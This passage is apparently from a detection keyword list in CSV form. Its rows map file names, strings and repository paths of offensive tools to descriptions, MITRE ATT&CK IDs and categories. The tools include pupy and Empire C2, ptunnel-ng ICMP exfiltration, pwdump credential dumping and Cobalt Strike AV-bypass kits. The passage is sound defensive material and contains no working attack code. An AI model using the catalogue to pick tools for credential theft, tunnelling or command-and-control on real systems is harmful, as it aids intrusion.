T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*pth-wmis*,offensive_tool_keyword,pth-toolkit,A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems,T1550 - T1075 - T1110 - T1021,TA0002 - TA0003 - TA0005,N/A,N/A,Lateral movement,https://github.com/byt3bl33d3r/pth-toolkit,1,1,N/A,N/A,6,509,134,2015-02-06T15:10:41Z,2015-02-03T10:31:56Z -*PTRACE_SETOPTIONS failure*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*ptresearch/AttackDetection*,offensive_tool_keyword,POC,POC exploits - The Attack Detection Team searches for new vulnerabilities and 0-days. reproduces it and creates PoC exploits to understand how these security flaws work and how related attacks can be detected on the network layer. Additionally. we are interested in malware and hackers TTPs. so we develop Suricata rules for detecting all sorts of such activities.,T1210 - T1583 - T1586 - T1589 - T1596,TA0002 - TA0011 - TA0007,N/A,N/A,Exploitation tools,https://github.com/ptresearch/AttackDetection,1,1,N/A,N/A,10,1266,367,2022-08-31T09:26:21Z,2016-03-24T14:42:50Z -*ptunnel-client.log*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-data-recv*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,0,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-data-send*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,0,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-master*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-ng *,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,0,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-ng.conf*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-ng.git*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-ng.service*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-ng.te*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-ng-x64.exe*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-ng-x64-dbg.exe*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-ng-x86.exe*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-ng-x86-dbg.exe*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-server.log*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*Public\dcinst.exe*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*pupy*/checkvm.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*pupy/payload_*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*PupyCmdLoop*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*PupyCredentials.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*PupyDnsCnc.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*PupyDnsCommandServerHandler*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*pupygen.py *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*PupyKCPSocketStream*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*PupyLoaderTemplate.*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*PupyOffloadDNS*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*PupyOffloadSocket*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*PupySocketStream.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*PupyVirtualStream.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*pureqh/bypassAV*,offensive_tool_keyword,cobaltstrike,bypassAV cobaltstrike shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pureqh/bypassAV,1,1,N/A,10,10,434,101,2021-05-18T05:03:03Z,2021-02-25T05:26:11Z -*purevpn_cred_collector.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*purplepanda.py*,offensive_tool_keyword,PurplePanda,This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.,T1595 - T1078 - T1583 - T1087 - T1526,TA0003 - TA0004 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/carlospolop/PurplePanda,1,1,N/A,N/A,6,569,80,2023-08-07T04:13:59Z,2022-01-01T12:10:40Z -*purplepanda_config.py*,offensive_tool_keyword,PurplePanda,This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.,T1595 - T1078 - T1583 - T1087 - T1526,TA0003 - TA0004 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/carlospolop/PurplePanda,1,1,N/A,N/A,6,569,80,2023-08-07T04:13:59Z,2022-01-01T12:10:40Z -*purplepanda_github.py*,offensive_tool_keyword,PurplePanda,This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.,T1595 - T1078 - T1583 - T1087 - T1526,TA0003 - TA0004 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/carlospolop/PurplePanda,1,1,N/A,N/A,6,569,80,2023-08-07T04:13:59Z,2022-01-01T12:10:40Z -*PURPLEPANDA_NEO4J_URL=*,offensive_tool_keyword,PurplePanda,This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.,T1595 - T1078 - T1583 - T1087 - T1526,TA0003 - TA0004 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/carlospolop/PurplePanda,1,1,N/A,N/A,6,569,80,2023-08-07T04:13:59Z,2022-01-01T12:10:40Z -*purplepanda_prints.py*,offensive_tool_keyword,PurplePanda,This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.,T1595 - T1078 - T1583 - T1087 - T1526,TA0003 - TA0004 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/carlospolop/PurplePanda,1,1,N/A,N/A,6,569,80,2023-08-07T04:13:59Z,2022-01-01T12:10:40Z -*PURPLEPANDA_PWD=*,offensive_tool_keyword,PurplePanda,This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.,T1595 - T1078 - T1583 - T1087 - T1526,TA0003 - TA0004 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/carlospolop/PurplePanda,1,1,N/A,N/A,6,569,80,2023-08-07T04:13:59Z,2022-01-01T12:10:40Z -*PurpleSharp.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*putterpanda_whoami*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*puttygen.exe FUZZ*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*puzzlepeaches/NTLMRecon*,offensive_tool_keyword,NTMLRecon,Enumerate information from NTLM authentication enabled web endpoints,T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001,TA0009 - TA0007 - TA0006,N/A,N/A,Discovery,https://github.com/puzzlepeaches/NTLMRecon,1,1,N/A,8,1,32,3,2023-08-16T14:34:10Z,2023-08-09T12:10:42Z -*PWCrack*,offensive_tool_keyword,PWCrack,cracking tool for multiple hash type,T1110 - T1111 - T1210 - T1558.002 - T1555,TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/L-codes/pwcrack-framework,1,1,N/A,N/A,5,456,57,2023-09-27T08:26:21Z,2018-07-01T08:33:55Z -*pwd*/*/rules/best64.rule*,offensive_tool_keyword,AD exploitation cheat sheet,Crack the hash with Hashcat,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*pwd_dump *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*PWDump *,signature_keyword,Antivirus Signature,Antivirus signature - a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems,N/A,N/A,N/A,N/A,Credential Access,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PWDump.*,offensive_tool_keyword,pwdump,a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems,T1003 - T1027 - T1055 - T1056 - T1059 - T1078 - T1087 - T1098 - T1110 - T1212 - T1547,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://ftp.samba.org/pub/samba/pwdump/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*pwdump.exe*,offensive_tool_keyword,fgdump,A utility for dumping passwords on Windows NT/2000/XP/2003 machines,T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001,TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008,N/A,Volt Typhoon,Credential Access,https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*-PWDumpFormat*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*pw-inspector -*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*pw-inspector.*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*pwn_jenkins*,offensive_tool_keyword,pwn_jenkins,Remote Code Execution for jenkins,T1216 - T1210 - T1573,TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/gquere/pwn_jenkins,1,0,N/A,N/A,10,1681,298,2023-03-09T09:16:14Z,2018-07-18T14:24:27Z -*pwn1sher/CS-BOFs*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 